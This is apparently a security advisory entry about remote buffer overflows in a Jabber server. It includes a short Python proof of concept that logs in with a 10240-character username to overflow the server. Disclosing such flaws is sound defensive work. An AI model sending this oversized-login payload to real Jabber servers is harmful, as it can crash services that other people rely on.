|
Jabber Server Multiple Remote Buffer Overflow Vulnerabilities
The following proof of concept has been made available: #!/usr/bin/python import xmpp name = 'a'*10240 # Born a client cl=xmpp.Client('localhost') if not cl.connect(server=('192.168.10.138',5222)): raise IOError('Can not connect to server.') if not cl.auth(name,'jabberuserpassword','optional resource name'): raise IOError('Can not auth with server.') cl.disconnect() Currently we are not aware of any exploits for these issues. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>. |
|
Privacy Statement |